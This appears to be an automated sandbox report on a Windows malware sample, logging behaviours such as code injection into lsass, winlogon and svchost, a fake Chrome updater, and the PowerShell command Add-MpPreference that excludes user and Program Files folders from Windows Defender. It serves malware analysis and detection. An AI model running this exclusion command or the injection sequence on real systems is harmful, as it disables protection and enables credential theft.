API call chain: ExitProcess graph end node

graph_4-510

Source: C:\Users\user\Desktop\ylVAEHbMLf.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\System32\winlogon.exe

Code function: 7_2_00000225DC647E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

7_2_00000225DC647E70

Source: C:\Windows\System32\dialer.exe

Code function: 4_2_00007FF78AB314E4 GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,K32EnumProcesses,OpenProcess,K32EnumProcessModules,ReadProcessMemory,CloseHandle,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,

4_2_00007FF78AB314E4

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\dialer.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

Source: C:\Windows\System32\winlogon.exe	Code function: 7_2_00000225DC647E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_00000225DC647E70
Source: C:\Windows\System32\winlogon.exe	Code function: 7_2_00000225DC64B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_00000225DC64B50C
Source: C:\Windows\System32\winlogon.exe	Code function: 7_2_00000225DC6A7E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_00000225DC6A7E70
Source: C:\Windows\System32\winlogon.exe	Code function: 7_2_00000225DC6AB50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_00000225DC6AB50C
Source: C:\Windows\System32\lsass.exe	Code function: 8_2_00000202C0AE7E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_00000202C0AE7E70
Source: C:\Windows\System32\lsass.exe	Code function: 8_2_00000202C0AEB50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_00000202C0AEB50C
Source: C:\Windows\System32\svchost.exe	Code function: 9_2_000002A661307E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	9_2_000002A661307E70
Source: C:\Windows\System32\svchost.exe	Code function: 9_2_000002A66130B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	9_2_000002A66130B50C
Source: C:\Windows\System32\dwm.exe	Code function: 10_2_000002BAAE297E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	10_2_000002BAAE297E70
Source: C:\Windows\System32\dwm.exe	Code function: 10_2_000002BAAE29B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	10_2_000002BAAE29B50C
Source: C:\Windows\System32\svchost.exe	Code function: 11_2_0000026A879CB50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	11_2_0000026A879CB50C
Source: C:\Windows\System32\svchost.exe	Code function: 11_2_0000026A879C7E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	11_2_0000026A879C7E70
Source: C:\Windows\System32\svchost.exe	Code function: 12_2_00000179537AB50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	12_2_00000179537AB50C
Source: C:\Windows\System32\svchost.exe	Code function: 12_2_00000179537A7E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	12_2_00000179537A7E70
Source: C:\Windows\System32\svchost.exe	Code function: 12_2_0000017953D4B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	12_2_0000017953D4B50C
Source: C:\Windows\System32\svchost.exe	Code function: 12_2_0000017953D47E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	12_2_0000017953D47E70
Source: C:\Windows\System32\svchost.exe	Code function: 13_2_000002295D567E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	13_2_000002295D567E70
Source: C:\Windows\System32\svchost.exe	Code function: 13_2_000002295D56B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	13_2_000002295D56B50C
Source: C:\Windows\System32\svchost.exe	Code function: 14_2_0000025306E67E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	14_2_0000025306E67E70
Source: C:\Windows\System32\svchost.exe	Code function: 14_2_0000025306E6B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	14_2_0000025306E6B50C
Source: C:\Windows\System32\svchost.exe	Code function: 15_2_000001845B3B7E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	15_2_000001845B3B7E70
Source: C:\Windows\System32\svchost.exe	Code function: 15_2_000001845B3BB50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	15_2_000001845B3BB50C
Source: C:\Windows\System32\svchost.exe	Code function: 16_2_000001ADECD4B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	16_2_000001ADECD4B50C
Source: C:\Windows\System32\svchost.exe	Code function: 16_2_000001ADECD47E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	16_2_000001ADECD47E70
Source: C:\Windows\System32\svchost.exe	Code function: 17_2_000001D55907B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	17_2_000001D55907B50C
Source: C:\Windows\System32\svchost.exe	Code function: 17_2_000001D559077E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	17_2_000001D559077E70
Source: C:\Windows\System32\svchost.exe	Code function: 18_2_00000241A9EAB50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	18_2_00000241A9EAB50C
Source: C:\Windows\System32\svchost.exe	Code function: 18_2_00000241A9EA7E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	18_2_00000241A9EA7E70
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Code function: 21_2_000002152C3EB50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	21_2_000002152C3EB50C
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Code function: 21_2_000002152C3E7E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	21_2_000002152C3E7E70
Source: C:\Windows\System32\svchost.exe	Code function: 24_2_000001CD73197E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	24_2_000001CD73197E70
Source: C:\Windows\System32\svchost.exe	Code function: 24_2_000001CD7319B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	24_2_000001CD7319B50C
Source: C:\Windows\System32\svchost.exe	Code function: 26_2_000002824E89B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	26_2_000002824E89B50C
Source: C:\Windows\System32\svchost.exe	Code function: 26_2_000002824E897E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	26_2_000002824E897E70
Source: C:\Windows\System32\svchost.exe	Code function: 26_2_000002824E8FB50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	26_2_000002824E8FB50C
Source: C:\Windows\System32\svchost.exe	Code function: 26_2_000002824E8F7E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	26_2_000002824E8F7E70
Source: C:\Windows\System32\svchost.exe	Code function: 27_2_0000021B47B37E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	27_2_0000021B47B37E70
Source: C:\Windows\System32\svchost.exe	Code function: 27_2_0000021B47B3B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	27_2_0000021B47B3B50C

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
Source: C:\Users\user\Desktop\ylVAEHbMLf.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force	Jump to behavior

Allocates memory in foreign processes

Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\winlogon.exe base: 225DC610000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\lsass.exe base: 202C0AB0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2A6612D0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\dwm.exe base: 2BAAE260000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 26A87990000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 17953770000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2295D530000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 253067D0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1845B380000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1ADEBFD0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1D559040000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 241A9E70000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe base: 2152C1A0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1CD73160000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2824E860000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 21B473C0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2086F9D0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 17183BC0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 23FD3F70000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\winlogon.exe base: 225DC670000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\lsass.exe base: 202C0B10000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2A661330000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\dwm.exe base: 2BAAED80000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 26A87F40000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 179537D0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2295D590000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 25306E90000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1845B940000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1ADECD70000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1D5590A0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 241A9ED0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1CD731C0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2824E8C0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 21B47B60000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 20870090000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 17184290000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 23FD3FA0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1D2A4150000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 275BDF30000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1AAC0260000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 203C9F30000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1B5645B0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1BB7B2A0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1C004F60000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 24E2AB40000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2644ADB0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\spoolsv.exe base: 1990000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 20D25DA0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 26EF5350000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2A7F0D60000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 23D0FFB0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1B1C2570000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2108BCF0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 29166980000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 21C13EF0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1988D570000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 13869B40000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1E1CC740000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2855DA70000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2BF199D0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 15AF3890000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 21A03B80000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\sihost.exe base: 1CD40E40000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 151A6530000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 19E27BC0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 17D7B150000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1BE621A0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2252F480000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\ctfmon.exe base: 1F28B4B0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 184683D0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\explorer.exe base: 1380000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1972E260000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\dasHost.exe base: 2246C5E0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 221D5930000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1ECFC650000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1D178740000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1A633B40000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2928D0A0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\dllhost.exe base: 13DAB4C0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\smartscreen.exe base: 1A22A640000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 21C6CF30000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\audiodg.exe base: 1D349350000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 23B60DA0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 2135E7B0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1F22F7C0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\ApplicationFrameHost.exe base: 1F6E8150000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 20C52340000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2589DA90000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 1F5602E0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1F4197C0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1F8F1A00000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\dllhost.exe base: 228BE340000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\conhost.exe base: 20823A10000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1FDFD900000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 25CC2A30000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 144B2660000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe base: 2152C890000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1CF49670000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\conhost.exe base: 1988E640000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1F724890000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\wbem\WMIADAP.exe base: 222A2280000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\wbem\WMIADAP.exe base: 222A22E0000 protect: page execute and read and write

Contains functionality to inject code into remote processes

Source: C:\Windows\System32\dialer.exe

Code function: 4_2_00007FF78AB31DB4 CreateProcessW,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualAlloc,GetThreadContext,WriteProcessMemory,SetThreadContext,ResumeThread,OpenProcess,TerminateProcess,

4_2_00007FF78AB31DB4

Creates a thread in another existing process (thread injection)

Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\winlogon.exe EIP: DC612908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\lsass.exe EIP: C0AB2908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 612D2908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\dwm.exe EIP: AE262908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 87992908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 53772908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 5D532908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 67D2908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 5B382908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: EBFD2908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 59042908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe EIP: 2C1A2908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: A9E72908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 73162908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 4E862908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 473C2908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 6F9D2908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 83BC2908	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: DC672908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: C0B12908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 61332908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: AED82908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 87F42908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 537D2908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 5D592908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 6E92908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 5B942908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: ECD72908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 590A2908
